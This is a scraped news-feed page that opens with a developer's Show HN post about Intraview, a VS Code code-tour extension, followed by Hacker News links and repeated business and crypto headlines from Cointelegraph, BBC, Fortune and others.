I created Intraview to help me build and maintain a mental model of what I was building (or had vibed) so I could use my knowledge to either fix it myself, or provide more directed instruction. It grew into something that's transformed my workflow in a pleasant way.

Intraview is a VS Code extension that allows you to create: - Dynamic code tours built by your existing Agent - Storage and sharing of tours (it's a file) - Batch Feedback/commenting inline in IDE in-tour and without (it's also a file)

Here's a video walkthrough for the show vs tell crowd where I jump in a random (Plotly JS) open source repo and build a tour to get started: https://www.youtube.com/watch?v=ROBvFlG6vtY

Talking tech design, this is very different than most because the whole App is cloudless. Not server less, there's no external APIs (outside basic usage telemetry).

  - basic TypeScript app, JS/CSS/HTML
  - Localhost MCP server inside VS Code (one per workspace open)
 
Three of the biggest challenges I faced was:

  - re-considering the user experience given there's no database 
  - trying to build a reasonable experience to manage MCP connection across so many different setups.
  - testing the many forks, Agents and themes because I wanted to make it look native (I'll probably reverse course here in future iterations)
What I'm curious about is, where do you see the value:

  - New project/developer onboarding 
  - PR reviews 
  - Keeping up with Agentic code 
  - Perf reviews (for EM), you could build a tour biggest contributions by a GitHub handle
  - Planning alignment and review with your Agent
You can see the extension page in VS Code with these custom links (Note: this redirects and requires permission to open VS Code, won't actually install, takes another click)

  - for VS Code: https://intraview.ai/install?app=vscode
  - for Cursor: https://intraview.ai/install?app=cursor
Once it's installed and you confirm MCP is connected to your local server, just ask your Agent:

  - Create an Intraview the onboarding for this app..
  - Let's use Intraview to gather my feedback on [whatever you created]. Break down steps such that I can provide good granular feedback.
Looking forward to your feedback and discussion.

And because this is HN. A relevant quotable from PG.

  “Your code is your understanding 
  of the problem you’re exploring. 
  So it’s only when you have your code 
  in your head that you really understand
   the problem.” 
  
  — Paul Graham


Comments URL: https://news.ycombinator.com/item?id=45837067

Points: 12

# Comments: 0

Article link

Date of publish: Thu, 06 Nov 2025 16:35:53 +0000

FBI tries to unmask owner of archive.is

Article URL: https://www.heise.de/en/news/Archive-today-FBI-Demands-Data-from-Provider-Tucows-11066346.html

Comments URL: https://news.ycombinator.com/item?id=45836826

Points: 615

# Comments: 324

Article link

Date of publish: Thu, 06 Nov 2025 16:18:18 +0000

Supply chain attacks are exploiting our assumptions

Article URL: https://blog.trailofbits.com/2025/09/24/supply-chain-attacks-are-exploiting-our-assumptions/

Comments URL: https://news.ycombinator.com/item?id=45836466

Points: 44

# Comments: 33

Article link

Date of publish: Thu, 06 Nov 2025 15:46:01 +0000

Kimi K2 Thinking, a SOTA open-source trillion-parameter reasoning model

Article URL: https://moonshotai.github.io/Kimi-K2/thinking.html

Comments URL: https://news.ycombinator.com/item?id=45836070

Points: 512

# Comments: 198

Article link

Date of publish: Thu, 06 Nov 2025 15:06:06 +0000

Auraphone: A simple app to collect people's info at events

Article URL: https://andrewarrow.dev/2025/11/simple-app-collect-peoples-info-at-events/

Comments URL: https://news.ycombinator.com/item?id=45835931

Points: 21

# Comments: 13

Article link

Date of publish: Thu, 06 Nov 2025 14:54:16 +0000

I analyzed the lineups at the most popular nightclubs

Article URL: https://dev.karltryggvason.com/how-i-analyzed-the-lineups-at-the-worlds-most-popular-nightclubs/

Comments URL: https://news.ycombinator.com/item?id=45835083

Points: 136

# Comments: 64

Article link

Date of publish: Thu, 06 Nov 2025 13:37:07 +0000

Eating stinging nettles

Article URL: https://rachel.blog/2018/04/29/eating-stinging-nettles/

Comments URL: https://news.ycombinator.com/item?id=45834254

Points: 156

# Comments: 155

Article link

Date of publish: Thu, 06 Nov 2025 11:57:01 +0000

Business RSS

Business sites below.

Cointelegraph.com News

Philippines blockchain bill to battle corruption, crypto KOLs charged: Asia Express

Crypto influencers charged for shilling “Hong Kong’s FTX.” Philippines senate considers putting government budget on blockchain. Asia Express.

Hong Kong authorities on Wednesday formally charged influencers linked to the defunct crypto exchange JPEX.

Among those charged are Joseph Lam Chok, a lawyer turned influencer, and Chan Yee, a prominent KOL in the crypto community. Prosecutors say they promoted JPEX while either knowing or ignoring that the platform had no approval to operate in Hong Kong. Under Hong Kongs Anti-Money Laundering Ordinance, it is an offense to fraudulently or recklessly induce others to invest in crypto.

Six core members of the alleged JPEX group and seven operators of over-the-counter crypto shops were also charged, along with three individuals accused of serving as front account holders.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:27:59 +0000

Research explains why AI sucks at freelance work and real-life tasks: AI Eye

Researchers found AI is hopeless at most Upwork task, it gets the news wrong half the time — and humans crush AI on world model tests. AI Eye.

AI agents cant complete 97% of tasks on Upwork to even a basic standard.

Researchers at Scale AI and the Center for AI Safety got six different AI models to attempt 240 Upwork projects across categories, including writing, design and data analysis and then compared the results to the real freelancer.

The overwhelming majority of the time, the AI models were unable to complete the tasks successfully, with the best AI model, Manus, completing just 2.5% of tasks and earning $1,810 out of $143,991 on offer. Claude Sonnet and Grok 4 managed to finish 2.1% of the tasks.

While AI agents are good at simple and defined tasks like “generate a logo,” the research found they are bad at multi-step workflows, taking any initiative or using judgment.

So they wont be causing mass unemployment for a while yet.

This backs up research from August at MIT, which found that 95% of organizations had zero return on the collective $30 billion theyd invested in AI.

AIs are good at pattern matching and predicting words. But theyre currently pretty bad at building internal models of the world, according to WorldTest from MIT and Basis Research.

For example, humans have an internal model of their own kitchen in their minds, which allows them to determine where the knives are, how long it will take for the pot to boil, and to plan a sequence of actions resulting in a meal. But the testing showed that three frontier reasoning AI models suck at it.

The researchers created 129 tasks across 43 interactive worlds (spot the difference, physics puzzles, etc). The tasks required the AIs to predict hidden aspects of the world, plan sequences of actions to achieve a goal, and determine when the rules of the environment changed. Then they tested 517 humans on the same problems.

The researchers concluded:

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:13:37 +0000

Good luck suing crypto exchanges, market makers over the flash crash

If a crypto exchange has tech glitches, or a market maker pulls liquidity, exacerbating a flash crash, there are few legal avenues to pursue.

Almost twenty billion dollars in perpetual futures positions were liquidated during the Oct. 10 crypto crash, prompting traders to ask who should pay if platforms fail under pressure.

Unlike regulated securities exchanges, crypto venues can pull liquidity, cut profitable positions and often rely on arbitration clauses that limit legal recourse as long as users have clicked I agree.

In the latest liquidation frenzy, Binance was at the center of controversy as some users claimed they were unable to properly close their positions in time. Binance said its core features remained operational, but acknowledged technical glitches that caused certain asset prices to appear temporarily depegged from the broader market.

Earlier this weeks social media was rife with rumors that market maker Wintermute planned to sue Binance over losses sustained during the crash, although that was quickly denied by CEO Evgeny Gaevoy.

Read more

Article link

Date of publish: Wed, 05 Nov 2025 14:20:00 +0000

News Ticker - markets.businessinsider.com

ENDVR Energy Launches with New Name, Branding, and Website to Power Ontario’s Sustainable Energy Future

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />MILTON, Ontario, Nov. 06, 2025 (GLOBE NEWSWIRE) -- ENDVR Energy, a subsidiary of Milton Hydro Holdings Inc., is proud to announce its official launch under its new name and branding, alongside the unveiling of its website at <a href="https://www.

Article link

Date of publish: Thu, 06 Nov 2025 15:08:11 GMT

I'm the CMO of fintech Chime. AI has helped us make ads 60% faster and rely less on agencies.

Article link

Date of publish: Thu, 06 Nov 2025 15:06:00 GMT

HelixIntel and USIP Partner to Strengthen Maintenance Operations for Small and Mid-Sized School Districts

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Key Takeaways: <ul type="disc"><li style="margin-bottom:8pt;">Strategic Expansion: HelixIntel’s CMMS is available to small and mid-sized school districts in Washington through a partnership with USIP and Clear Risk Solutions.</li><li...

Article link

Date of publish: Thu, 06 Nov 2025 15:05:00 GMT

BBC News

Elon Musk's $1tn pay deal approved by Tesla shareholders

The richest man in the world will get hundreds of millions of new shares if he hits his targets.

Article link

Date of publish: Thu, 06 Nov 2025 23:25:25 GMT

Bank says inflation has 'peaked' as it holds interest rates

Rates are left unchanged after a tight vote ahead of the Budget later this month.

Article link

Date of publish: Thu, 06 Nov 2025 17:35:34 GMT

Will Bank of England governor play Santa or Scrooge on interest rates?

The interest rate decision was made by the narrowest of margins, meaning all eyes are now on the Bank's December meeting.

Article link

Date of publish: Thu, 06 Nov 2025 15:16:35 GMT

The world this week

The weekly cartoon

Article link

Date of publish: Thu, 06 Nov 2025 14:01:38 +0000

Business

Article link

Date of publish: Thu, 06 Nov 2025 14:01:38 +0000

Politics

Article link

Date of publish: Thu, 06 Nov 2025 14:01:38 +0000

Fortune | FORTUNE

Jamie Dimon says he still reads customer complaints himself because his staff filters too much: ‘The bureaucracy does want to control you’

“If you’re in a position like mine, you’ve got to break down those barriers all the time,” Dimon said.

Article link

Date of publish: Thu, 06 Nov 2025 17:19:19 +0000

Scott Galloway says he’s a product of big government: ‘Taking bets on unremarkable people pays off’

Galloway credits UCLA for his success, despite an initial rejection: “California taxpayers and the regents of the University of California saved my ass.”

Article link

Date of publish: Thu, 06 Nov 2025 16:05:56 +0000

For Gen Z, it’s ‘not enough to work hard’ if you want to succeed, says Jamie Dimon—specific skills are the way to get ahead

“In the old days, you could be in 10th grade, go get a factory job in Detroit, and eventually you could afford a family, a home, a car, and that may not be true anymore,” Dimon said.

Article link

Date of publish: Thu, 06 Nov 2025 16:01:04 +0000

Business

All News

Musk’s $1 trillion Tesla pay package approved by shareholders

Article link

Date of publish: 2025-11-06 22:23:51

Retail darling Opendoor plummets on Q3 miss, management’s cautious guidance

Article link

Date of publish: 2025-11-06 22:12:56

Stock market today: S&P 500 falls as job cuts stoke economic fears, tech stutters

Article link

Date of publish: 2025-11-06 22:07:28

Cointelegraph.com News

Philippines blockchain bill to battle corruption, crypto KOLs charged: Asia Express

Crypto influencers charged for shilling “Hong Kong’s FTX.” Philippines senate considers putting government budget on blockchain. Asia Express.

Hong Kong authorities on Wednesday formally charged influencers linked to the defunct crypto exchange JPEX.

Among those charged are Joseph Lam Chok, a lawyer turned influencer, and Chan Yee, a prominent KOL in the crypto community. Prosecutors say they promoted JPEX while either knowing or ignoring that the platform had no approval to operate in Hong Kong. Under Hong Kongs Anti-Money Laundering Ordinance, it is an offense to fraudulently or recklessly induce others to invest in crypto.

Six core members of the alleged JPEX group and seven operators of over-the-counter crypto shops were also charged, along with three individuals accused of serving as front account holders.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:27:59 +0000

Research explains why AI sucks at freelance work and real-life tasks: AI Eye

Researchers found AI is hopeless at most Upwork task, it gets the news wrong half the time — and humans crush AI on world model tests. AI Eye.

AI agents cant complete 97% of tasks on Upwork to even a basic standard.

Researchers at Scale AI and the Center for AI Safety got six different AI models to attempt 240 Upwork projects across categories, including writing, design and data analysis and then compared the results to the real freelancer.

The overwhelming majority of the time, the AI models were unable to complete the tasks successfully, with the best AI model, Manus, completing just 2.5% of tasks and earning $1,810 out of $143,991 on offer. Claude Sonnet and Grok 4 managed to finish 2.1% of the tasks.

While AI agents are good at simple and defined tasks like “generate a logo,” the research found they are bad at multi-step workflows, taking any initiative or using judgment.

So they wont be causing mass unemployment for a while yet.

This backs up research from August at MIT, which found that 95% of organizations had zero return on the collective $30 billion theyd invested in AI.

AIs are good at pattern matching and predicting words. But theyre currently pretty bad at building internal models of the world, according to WorldTest from MIT and Basis Research.

For example, humans have an internal model of their own kitchen in their minds, which allows them to determine where the knives are, how long it will take for the pot to boil, and to plan a sequence of actions resulting in a meal. But the testing showed that three frontier reasoning AI models suck at it.

The researchers created 129 tasks across 43 interactive worlds (spot the difference, physics puzzles, etc). The tasks required the AIs to predict hidden aspects of the world, plan sequences of actions to achieve a goal, and determine when the rules of the environment changed. Then they tested 517 humans on the same problems.

The researchers concluded:

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:13:37 +0000

Good luck suing crypto exchanges, market makers over the flash crash

If a crypto exchange has tech glitches, or a market maker pulls liquidity, exacerbating a flash crash, there are few legal avenues to pursue.

Almost twenty billion dollars in perpetual futures positions were liquidated during the Oct. 10 crypto crash, prompting traders to ask who should pay if platforms fail under pressure.

Unlike regulated securities exchanges, crypto venues can pull liquidity, cut profitable positions and often rely on arbitration clauses that limit legal recourse as long as users have clicked I agree.

In the latest liquidation frenzy, Binance was at the center of controversy as some users claimed they were unable to properly close their positions in time. Binance said its core features remained operational, but acknowledged technical glitches that caused certain asset prices to appear temporarily depegged from the broader market.

Earlier this weeks social media was rife with rumors that market maker Wintermute planned to sue Binance over losses sustained during the crash, although that was quickly denied by CEO Evgeny Gaevoy.

Read more

Article link

Date of publish: Wed, 05 Nov 2025 14:20:00 +0000

YouTube’s Web3 gaming content ban, Animoca to list on Nasdaq: Web3 Gamer

YouTube launches “direct attack” on blockchain gaming vids, Animoca to list on Nasdaq five years after getting kicked off the ASX: Web3 Gamer.

YouTubes latest content rules announcement hasnt gone down well with Web3 gaming creators, who say the platform is unfairly targeting them.

YouTube’s new policy is a direct attack on Web3 gaming and CS skins, Gamer Leevai said in an X post. Fellow gamer Predz added, Know any Web3 creators? They need to see this.

The update, which is expected to roll out on Nov. 17, expands YouTubes definition of prohibited online gaming content to cover digital goods with monetary value, including skins, cosmetics, NFTs, and other blockchain-based assets. 

Read more

Article link

Date of publish: Tue, 04 Nov 2025 14:20:00 +0000

Bitcoin may drop 70% before $1M, MEXC’s ‘white whale’ apology: Hodler’s Digest, Oct. 26 – Nov. 1

Bitcoin will continue to experience cyclical booms and busts, MEXC apologizes to ‘White Whale’ trader over $3M freeze: Hodler’s Digest

Bybit, the worlds second-largest crypto exchange by trading volume, has announced it will pause new user registrations in Japan starting Oct. 31, as it adapts to new regulations from the countrys Financial Services Agency.

The company said the move is part of its proactive approach to align with Japans emerging regulatory framework for digital assets, according to a Wednesday announcement. 

It has always been Bybits commitment to operate responsibly and in compliance with local laws and regulatory expectations, the exchange said. 

Read more

Article link

Date of publish: Sun, 02 Nov 2025 03:31:12 +0000

China officially hates stablecoins, DBS trades Bitcoin options: Asia Express

China’s central bank boss really, really doesn’t like stablecoins and crypto, Japanese yen comes to DeFi: Asia Express.

China has finally put rumors to rest following a speech by Peoples Bank of China Governor Pan Gongsheng at an annual financial conference in Beijing.

After Hong Kongs stablecoin licensing regime took effect in August, several companies including some from mainland China reportedly lined up to apply for licenses in the city. The move had fueled speculation that Beijing might be preparing to ease its long-standing crypto ban.

However, Pan made clear that no such shift is underway. Referring to the series of prohibitions rolled out since 2017, he said the existing policies remain in effect.

Read more

Article link

Date of publish: Thu, 30 Oct 2025 21:31:40 +0000

Grokipedia: ‘Far right talking points’ or much-needed antidote to Wikipedia?

Grokipedia is far from perfect, but proponents argue it covers crypto and controversial topics in a more even-handed manner than Wikipedia.

For 24 years, Wikipedia has relied on fallible humans to write about everything there is to know about anything. Grokipedia, created by Elon Musks xAI, is finally set to challenge that. 

Supporters of Grokipedia say its the best thing thats come out on the internet since well, Wikipedia. However, Musks critics argue his new encyclopedia is nowhere near as neutral as it claims and is pushing right-wing talking points. 

But maybe theyre both right. 

Read more

Article link

Date of publish: Thu, 30 Oct 2025 13:20:00 +0000

Solana vs Ethereum ETFs, Facebook’s influence on Bitwise: Hunter Horsley

Bitwise’s Hunter Horsley was stung by criticism from Ethereum Maxis about the firm’s support of Solana, as ETH helped inspire Bitwise in 2016

In the lead-up to this weeks surprise listing of its Solana Staking ETF on the New York Stock Exchange, Bitwise CEO Hunter Horsley caused a stir by telling Cointelegraph that Solanas shorter validator exit queue gave it the edge over Ethereum in the staking ETF race.

Bitwise chief investment officer Matt Houghan went much further on a podcast, praising Solanas speed, throughput and finality as extraordinarily attractive. He labelled it the new Wall Street.

The glowing endorsements were controversial among Ethereum fans, some of who seemed to believe Bitwise was betraying ETHs cypherpunk values by championing other projects.

Horsley was stung by the criticisms, not least because Ethereum was part of the inspiration for creating Bitwise in the first place.

He replied he felt terrible to see these posts. We care a lot about Ethereum. Feedback received re recent commentary seeming to be at odds with values in the ETH community. Its being taken to heart.

Read more

Article link

Date of publish: Wed, 29 Oct 2025 13:20:00 +0000

Bitcoin OG Kyle Chassé is one strike away from a YouTube permaban

Bitcoin OG Kyle Chassé has turned to AI to figure out why YouTube is just one step away from canceling his channel forever.

Kyle Chass, a Bitcoin OG whom many in the crypto community know from his popular YouTube channel over the years, has one Google warning left.

One more strike and his YouTube channel, and the result of years of daily grinding, could vanish forever.

When it gets deleted, theres no appeal to bring the account back, Chass tells Magazine. 

Read more

Article link

Date of publish: Tue, 28 Oct 2025 13:20:00 +0000

Bitcoin flashing ‘rare’ top signal, Hayes tips $1M BTC: Hodler’s Digest, Oct. 19 – 25

Bitcoin’s price chart resembling the soybean market around 50 years ago, BitMEX’s Arthur Hayes makes big Bitcoin call: Hodler’s Digest

The anonymous crypto trader who supposedly made millions shorting the crypto market before US President Donald Trumps tariff announcement appears to have profited again by betting that Trump would pardon the founder of Binance. 

Onchain sleuth Euan pointed to Etherscan data to make the connection between the trader and the Polymarket account. The crypto wallet reportedly made $56,522 on Polymarket by betting that Trump would pardon Changpeng CZ Zhao sometime in 2025. 

The crypto trader had already been suspected in crypto circles of having access to insider knowledge after their tightly timed Bitcoin and Ethereum shorts, just hours before Trumps tariff announcement sent prices falling.

Read more

Article link

Date of publish: Sun, 26 Oct 2025 05:59:28 +0000

Most wealthy Hong Kong investors plan to buy crypto, Japan’s Bitcoin plan: Asia Express

The majority of wealthy investors surveyed in Hong Kong plan to buy crypto this year, Japan to allow banks to hold Bitcoin. Asia Express.

Standard Chartered Hong Kong will reportedly launch trading services for crypto exchange-traded funds (ETFs) in November.

According to the banks wealthy clients study cited by local newspaper Ming Pao, nearly 80% plan to invest in digital assets within the next year, while more than 30% already hold some form of crypto exposure. 

The survey covered over 500 respondents with at least 1 million Hong Kong dollars (about $128,650) in liquid assets.

Read more

Article link

Date of publish: Thu, 23 Oct 2025 22:53:45 +0100

Mysterious Mr Nakamoto author: Finding Satoshi would hurt Bitcoin

Author Benjamin Wallace searched for years to find the real identity of Satoshi Nakamoto but concluded the mystery is more valuable unsolved.

Benjamin Wallace has an amusingly direct way of trying to solve the identity of Bitcoins creator in his book The Mysterious Mr Nakamoto.

He just asks every possible candidate: Are you Satoshi Nakamoto?

I still didnt rule out the possibility that Nakamoto was frustrated no one had bothered to simply ask him, Wallace writes.

It seems like every other week, theres another newspaper investigation, documentary or nonfiction book promising to unmask Satoshi. 

Read more

Article link

Date of publish: Thu, 23 Oct 2025 14:20:00 +0100

Cliff bought 2 homes with Bitcoin mortgages: Clever… or insane?

Should you buy a house with a Bitcoin-backed mortgage? The dream is you pay off the house as Bitcoin goes up, the risk is you lose it all.

If youre one of the lucky people who own four to six Bitcoin or 111 to 166 ETH that’s enough to buy an average-priced house in the US or Australia.

But who wants to cash out their Bitcoin today when pundits like Samson Mow and Plan B are tipping it will be worth 10 times more in the future? The dream of a Bitcoin-backed mortgage is that you get a house today and still get to benefit from Bitcoins appreciation tomorrow.

If everything goes to plan, you just pay the interest each year, and in a few years’ time, hopefully pay off the mortgage with a smaller fraction of your Bitcoin holdings. The loans are quicker and easier to get than a standard mortgage too. All you need is Bitcoin worth approximately 50% more than the loan amount and youre good to go.

There are some big drawbacks however, with interest rates sometimes twice as high as ordinary mortgages. Holders face margin calls if the price of Bitcoin plummets and their loan-to-value (LTV) ratio drops too far.

Read more

Article link

Date of publish: Wed, 22 Oct 2025 14:20:00 +0100

Bitcoin to suffer if it can’t catch gold, XRP bulls back in the fight: Trade Secrets

Bitcoin traders expect the asset to “bounce soon,” while an XRP DAT and looming ETF approvals brought bulls back out to fight: Trade Secrets.

Welcome to Trade Secrets Bitcoin and Ether price predictions from top analysts, along with options data, sentiment analysis and prediction markets to determine what they can tell us about the months and years ahead.

Bitcoin is facing a critical two-month countdown before market sentiment could shift dramatically for the asset, warns crypto analyst Will Clemente.

If Bitcoin doesnt catch up to gold/stocks by EOY, on a risk-adjusted basis, its going to be tougher to make a case for it going forward as anything more than a diversifier, Clemente said.

Read more

Article link

Date of publish: Tue, 21 Oct 2025 14:20:00 +0100

Ether’s price to go ‘nuclear,’ Ripple seeks $1B XRP buy: Hodler’s Digest, Oct. 12 – 18

Crypto analysts mull over Ether’s price going “nuclear,” Ripple Labs seeks to buy $1 billion XRP tokens, and other news: Hodler’s Digest

Several regional banks in the United States are facing renewed stress despite strengthening their finances after the 2023 banking crisis, and Bitcoin could benefit from any liquidity crisis that follows.

Strike CEO Jack Mallers sees the banking stress as validation that Bitcoin is correctly pricing in an impending liquidity crisis, opining that the Federal Reserves inevitable response will drive BTC prices higher. 

Bitcoin is accurately smelling trouble right now, he said on the Primal social media platform on Friday. The US is going to have to inject some of that sweet, sweet liquidity soon and print a ton of money or else their fiat empire goes kaboom.

Read more

Article link

Date of publish: Sat, 18 Oct 2025 22:22:36 +0100

Binance shakes up Korea, Morgan Stanley’s security tokens in Japan: Asia Express

Four years on, Binance is back in South Korea! Plus, Morgan Stanley and Japan’s largest bank have a new digital asset division. Asia Express.

Binance is returning to South Korea nearly five years after exiting the market in December 2020, following the Financial Intelligence Units (FIU) approval of its acquisition of Gopax one of only five local exchanges authorized to provide crypto-to-fiat services.

According to a Maeil Business Newspaper exclusive, the FIU granted final approval on Wednesday, ending more than two years of uncertainty over Binances reentry. The exchange acquired a majority stake in Gopax in 2023, but the deal stalled amid regulatory scrutiny and Binances legal troubles in the US.

The return of the worlds largest cryptocurrency exchange could shake up South Koreas long-standing duopoly of Upbit and Bithumb. Under the countrys crypto regulations, exchanges must partner with a domestic bank to offer real-name verified accounts. Though the system is designed to strengthen Anti-Money Laundering and Know Your Customer compliance, it has made market entry difficult for newcomers.

Read more

Article link

Date of publish: Thu, 16 Oct 2025 23:12:41 +0100

Back to Ethereum: How Synthetix, Ronin and Celo saw the light

High value DeFi projects like Synthetix and Aave are making Ethereum L1 great again, as Ronin, Celo and Phala switch chains to become L2s.

In recent months, a raft of alt-L1s joined Ethereum to become L2s, even as other projects on L2s switch back to the Ethereum mainnet.

The Ethereum L1 is reasserting its claim to be the home of high-value DeFi it has seven times more TVL than its nearest rival while the L2 model offers millions in potential savings, along with network effects for alt-L1s that join the ecosystem.

Back in March, when bearishness around the extractive L2 roadmap was at its peak, mobile payments network Celo quietly closed down its validator network to become an L2. Now, its saving almost $7 million a year in operating costs.

In August, blockchain gaming L1 Ronin announced it was coming home to Ethereum in early 2026, five years after network congestion forced its popular game Axie Infinity off mainnet.

Ethereum has largely delivered on the scaling roadmap, says Jeffrey “Jiho” Zirlin, co-founder of Sky Mavis, which built both the game and alt-L1. 

Read more

Article link

Date of publish: Thu, 16 Oct 2025 14:20:00 +0100

Sharplink exec shocked by level of BTC and ETH ETF hodling: Joseph Chalom

Sharplink Gaming co-CEO and former BlackRock exec Joseph Chalom was surprised by the diamond hands of Bitcoin and Ethereum ETF hodlers.

More than a year on from their debut, the success of BlackRocks Bitcoin and Ether ETFs blindsided its former digital assets strategy chief, Joseph Chalom.

But what could possibly surprise a 20-year veteran of a company thats seen it all a financial giant thats been around for nearly four decades, weathered every market cycle, and manages more than $10 trillion in assets?

It wasnt the billions pouring in or the wall-to-wall news headlines; it was how investors behaved once they were in.

Read more

Article link

Date of publish: Wed, 15 Oct 2025 14:20:00 +0100

Review: The Devil Takes Bitcoin, a wild history of Mt. Gox and Silk Road

Jake Adelstein’s The Devil Takes Bitcoin delves into the wild history of Silk Road and the Mt. Gox collapse and the hunt for the real hacker.

If youve ever seen Jake Adelsteins prior work, such as The Last Yakuza or watched the HBO drama Tokyo Vice, you might expect his latest book, The Devil Takes Bitcoin, to be a gritty expos of Bitcoins criminal underbelly.

And youd be mostly right. Adelstein delivers a captivating memoir centered on the fall of the largest Bitcoin exchange in the world, Mt. Gox, and the crackdown on the darknet marketplace Silk Road showing what happens when good intentions, money and a flawed justice system collide. 

But its the message that sets it apart. Adelstein argues its this tragicomic series of events that ultimately propelled Bitcoin to where it is today similar to how the porn industry secretly drove the rise of the internet.

Read more

Article link

Date of publish: Tue, 14 Oct 2025 14:20:00 +0100

‘Debasement trade’ will pump Bitcoin, Ethereum DATs will win: Hodler’s Digest, Oct. 5 – 11

Bitcoin tumbles to $102,000 on Friday amid ‘macro whiplash,’ crypto betting platform Shuffle announces user data breach: Hodler’s Digest

US President Donald Trump announced a 100% tariff on China on Friday, sending the price of Bitcoin reeling below $110,000 at the time of writing.

Trump said the tariffs were in response to China attempting to place export restrictions on rare earth minerals, which are crucial for creating computer chips. Trump wrote on Truth Social:

It has just been learned that China has taken an extraordinarily aggressive position on Trade in sending an extremely hostile letter to the World, stating that they were going to, effective November 1, 2025, impose large-scale Export Controls on virtually every product they make.

Read more

Article link

Date of publish: Sat, 11 Oct 2025 23:56:19 +0100

Alibaba founder’s Ethereum push, whales are 91% of Korean market: Asia Express

Alibaba founder’s company backs another Ethereum-based project, South Korean whales account for 91% of the market: Asia Express.

Anthea Holding Limited, a Bermuda-based crypto insurance firm, has raised $22 million in Series A financing led by Yunfeng Financial Group, a Hong Kong-listed fintech company co-founded by Alibaba founder Jack Ma. 

Anthea said the new capital will fund the launch of its first Ethereum-based life insurance product, alongside expansion into the Asian market.

The investment comes just over a month after Yunfeng Financial purchased 10,000 ETH (about $44 million), which serves as a strategic reserve for real-world asset tokenization and DeFi-linked insurance applications.

Read more

Article link

Date of publish: Thu, 09 Oct 2025 22:42:14 +0100

Worldcoin’s less ‘dystopian,’ more cypherpunk rival: Billions Network

Could using ZK-proofs to verify IDs help resolve privacy concerns related to the UK’s Digital ID and Australia’s social media age limits?

The idea behind Worldcoin (now called World) is an excellent one: without some way to verify human-based accounts, the internet will be completely overrun with AI bots.

To a large extent, it already is: More than half of web traffic now comes from unidentified accounts, and Facebook and X are drowning in AI slop and pointless reply guys. More worryingly, hostile countries are using AI bots and content to divide the population of open and democratic societies.

And if you are already worried about the UK’s mandatory digital ID plan, then World ID should also be on your radar. Apart from those creepy eyeball scanning Orbs, is it really a good idea to implement a global identity system co-founded by the CEO of the worlds largest private company, OpenAI?

The project has raised significant privacy and ethical concerns, with Canadian public broadcaster CBC describing Worlds aims as utopian but not without raising dystopian fears. Techmonitor and CoinDesk have both reported that critics of the project call it “Orwellian.”

Read more

Article link

Date of publish: Thu, 09 Oct 2025 14:20:00 +0100

EU’s privacy-killing Chat Control bill delayed — but fight isn’t over

Germany is set to thwart the EU’s Chat Control plan to scan encrypted messages before they’re sent. But Cypherpunks warn the fight isn’t over.

In an apparent victory for digital privacy, the head of the largest political party in Germany has come out against controversial legislation that would enable mass online state surveillance.

German technology news site Heise Online reports that next week’s vote in the EU Council has now been delayed, although this was not confirmed at the time of writing.

Under the guise of fighting child sexual abuse material, the “Chat Control regulations would enable the mass surveillance of private messages prior to encryption on platforms such as Telegram and WhatsApp.

But cypherpunks know that even if this attempt fails, its only a matter of time before they try again, because this is a battle that has been fought many times.

Read more

Article link

Date of publish: Wed, 08 Oct 2025 14:20:00 +0100

Gaming giants in talks with Immutable to launch token: Web3 Gamer

Immutable’s Robbie Ferguson says gaming giants are gearing up to launch tokens: plus why saying “Web3 gaming is dead” is bullish: Web3 Gamer.

Gaming giants who once treated crypto like a shady mystery are now stampeding to get in on the action, according to Immutable co-founder Robbie Ferguson.

I can tell you right now, were in conversations with multibillion-dollar gaming companies about them launching a token, which we would have been laughed out of those rooms 12 months ago, Ferguson tells Magazine during a sit-down interview at Token2049 in Singapore.

Ferguson says the change comes as US lawmakers inch closer to regulatory certainty with the Digital Asset Market Clarity Act, which aims to clarify the roles of the Securities and Exchange Commission, the Commodity Futures Trading Commission and other financial agencies that regulate the crypto market.

Read more

Article link

Date of publish: Tue, 07 Oct 2025 14:20:00 +0100

Bitcoin may move ‘very quick’ to $150K, altseason doubts: Hodler’s Digest, Sept. 28 – Oct. 4

A crypto analyst forecasts Bitcoin moving quickly to $150,000 once it breaks $120,000, altcoin season doubts, and more: Hodler’s Digest

Wall Streets growing interest in late-stage cryptocurrency firms could disrupt the traditional boom-and-bust cycle of digital assets, according to new research.

Crypto financial services firm Matrixport said Friday that more than $200 billion worth of crypto companies are preparing initial public offerings (IPOs), which may raise between $30 billion and $45 billion in new capital.

Matrixport said investor focus is rotating away from early-stage bets toward scalable, IPO-ready companies positioned for public markets.

Read more

Article link

Date of publish: Sat, 04 Oct 2025 23:58:53 +0100

Japan tours on XRP Ledger, USDC and USDT payments via Grab: Asia Express

SBI Ripple uses XRP Ledger for Japan tourism payments. Stablecoin payments go live in Singapore. Asia Express

SBI Ripple Asia has partnered with Japanese travel agency Tobu Top Tours to develop tokens and payment systems on the XRP Ledger.

Under the memorandum of understanding, SBI Ripple Asia will issue tokens on the XRP Ledger for use in a system that enables customers to pay for experiences such as accommodation, dining and shopping. Tobu Top Tours will be responsible for partner acquisition and marketing initiatives based on non-fungible tokens.

As the name of SBI Ripples new partner suggests, the payment system is expected to be applied in Japans booming tourism industry. SBI Ripple Asia also plans to expand use cases beyond tourism to include disaster relief support, economic revitalization projects and pop culture. It aims to launch in the first half of 2026.

Read more

Article link

Date of publish: Thu, 02 Oct 2025 23:45:07 +0100

Hong Kong isn’t the loophole Chinese crypto firms think it is

China’s 2021 crypto ban remains intact, and lawyer Joshua Chu explains why supposed loopholes in Hong Kong and beyond are illusions that end in crackdowns.

Chinas crypto ban has been in place since 2021, but that hasnt stopped companies from chasing what they believe are ways to reenter.

Hyped-up stablecoin announcements in Hong Kong and overseas listings that hint at digital assets are just some of the ways companies are testing boundaries. Each time, Beijing responds with fresh warnings a stark reminder that Chinas crypto U-turn isnt around the corner.

The latest warning reportedly came from the China Securities Regulatory Commission, which advised companies to pause real-world asset ventures in Hong Kong. It followed a state-owned company scrubbing announcements about tokenizing bonds and other enterprises revealing RWA projects, piling on recent warnings against stablecoins after Hong Kong introduced its licensing framework.

Read more

Article link

Date of publish: Thu, 02 Oct 2025 14:20:00 +0100

Forget The Terminator: SingularityNET’s Janet Adams is building AGI with heart

